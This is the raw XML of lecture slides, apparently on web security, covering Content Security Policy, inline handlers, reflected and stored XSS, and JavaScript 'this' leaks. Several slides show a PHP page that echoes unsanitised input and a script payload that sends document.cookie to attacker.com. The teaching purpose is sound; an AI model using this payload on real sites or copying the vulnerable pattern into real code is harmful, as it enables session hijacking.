              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘self’ truste.com”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" kern="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2593" y="6041239"/>
            <a:ext cx="1518744" cy="3793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01370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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699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3" descr="TimBerners-Le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90" y="1851027"/>
            <a:ext cx="3457575" cy="463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2" descr="TimOld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6675" y="1851025"/>
            <a:ext cx="3313113" cy="465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 dirty="0"/>
              <a:t>Inline event handlers are inline scripts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83846"/>
            <a:ext cx="9601200" cy="5222875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&lt;button </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= “…”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  <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Buy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/button&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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 smtClean="0"/>
              <a:t>should be written for example as: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</a:rPr>
              <a:t>&lt;button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class = “buy”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Buy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/button&gt;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$(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>button.buy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’).bind(“click”, function(){ … } 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</a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>button</a:t>
            </a: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id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= “buy”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Buy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/button&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“buy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("click", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}, false)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;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0" y="4512149"/>
            <a:ext cx="10150475" cy="933357"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="52000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>       								        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>JQUERY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-280332" y="6265377"/>
            <a:ext cx="10631206" cy="933357"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="52000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/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672262" y="6902914"/>
            <a:ext cx="1183616" cy="379359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>DOM API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218033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 in CSP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default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src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script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src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style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src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img-src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frame-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src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60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*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘none’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘self’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘unsafe-inline’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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422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XSS Vulnerable code  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122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30460" y="1686631"/>
            <a:ext cx="9220015" cy="5818876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dirty="0" smtClean="0"/>
              <a:t>Adding HTTP header: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server-side implementation of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1994"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> echo $_GET[term] ?&gt; :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/BODY&gt;   &lt;/HTML&gt;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0" y="2320928"/>
            <a:ext cx="10150475" cy="677069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent4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101327" tIns="50663" rIns="101327" bIns="50663" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Security-Policy:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0"/>
              <a:t> script-src </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘self’ trusted.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2674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831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Reflected XSS attack on example 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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3555" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34925" y="1490664"/>
            <a:ext cx="10115550" cy="5394325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zh-CN" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>; &lt;/script&gt; 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eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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what’s the consequence of this attack?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0" y="3794919"/>
            <a:ext cx="10150475" cy="677069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent4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101327" tIns="50663" rIns="101327" bIns="50663" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Security-Policy:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0"/>
              <a:t> script-src </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘self’ trusted.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2674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327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XSS Vulnerable app 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940" y="2280767"/>
            <a:ext cx="9022644" cy="5622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 bwMode="auto">
          <a:xfrm>
            <a:off x="279206" y="3396458"/>
            <a:ext cx="1838479" cy="95630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366" tIns="50683" rIns="101366" bIns="50683" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1013661" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin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2037750" y="4193380"/>
            <a:ext cx="1358876" cy="6375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3556495" y="4751227"/>
            <a:ext cx="4556231" cy="656354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="101366" tIns="50683" rIns="101366" bIns="50683" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>old messages stored in database in the server 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2037750" y="3077689"/>
            <a:ext cx="1438810" cy="3187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116032" y="3237075"/>
            <a:ext cx="3437157" cy="379355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="101366" tIns="50683" rIns="101366" bIns="50683" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user can leave a new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051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Stored XSS attack on example 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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3555" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34925" y="1490664"/>
            <a:ext cx="10115550" cy="53943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>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker leaves a message like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>; &lt;/script&gt; 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zh-CN" sz="3100" dirty="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/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en-US" altLang="zh-CN" sz="31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0" y="3596003"/>
            <a:ext cx="10150475" cy="677069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent4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101327" tIns="50663" rIns="101327" bIns="50663" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Security-Policy:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0"/>
              <a:t> script-src </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘self’ trusted.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="26743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38411" y="5468455"/>
            <a:ext cx="6641244" cy="596086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern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what’s the consequence of this attack? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="956940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3516" y="983868"/>
            <a:ext cx="11033927" cy="6875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44286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SOP and XSS?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When SOP applies, attacker’s script cannot access resources of trusted site (but we have already seen SOP bypass by permissive navigation policies) , so code can be injected but executed in isolation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For functionality, programmers decide to include external scripts using &lt;script&gt; and SOP does not apply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955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CSRF and XSS?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These two attacks are sometimes confused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XSS: executes attacker code in browser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CSRF: give unauthorized capabilities to attacker in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600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3" descr="TimBerners-Le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90" y="1851027"/>
            <a:ext cx="3457575" cy="463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2" descr="TimOld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6675" y="1851025"/>
            <a:ext cx="3313113" cy="465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TextBox 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3617916" y="6746874"/>
            <a:ext cx="2681287" cy="369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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tim Berners Lee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Leaks via this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33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378" y="49386"/>
            <a:ext cx="9134475" cy="1265238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Function: what’s the difference?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this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count=0;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increment(inc)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count=5;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	if (inc == undefined)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   {inc = 1;};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this.count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inc;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	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this.count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without this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count=0;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increment (inc)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count=5;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	if (inc == undefined)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   {inc = 1;};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	count += inc;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	return count;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419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378" y="49386"/>
            <a:ext cx="9134475" cy="1265238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Function: what’s the difference?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this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count=0;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increment(inc)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count=5;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	if (inc == undefined)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   {inc = 1;};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inc;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	return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without this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count=0;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increment (inc)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count=5;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	if (inc == undefined)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   {inc = 1;};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	count += inc;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	return count;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81441" y="6755473"/>
            <a:ext cx="3672408" cy="36930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lIns="91416" tIns="45708" rIns="91416" bIns="45708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this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is bound to the global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803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Important detail: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	When a function that returns “this” is called as a function and not as a constructor, this is bound to the global object (window)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Security problem: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	If a function that returns this is used by an attacker, the attacker has access to all resources in the page that are linked to window (in particular document and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
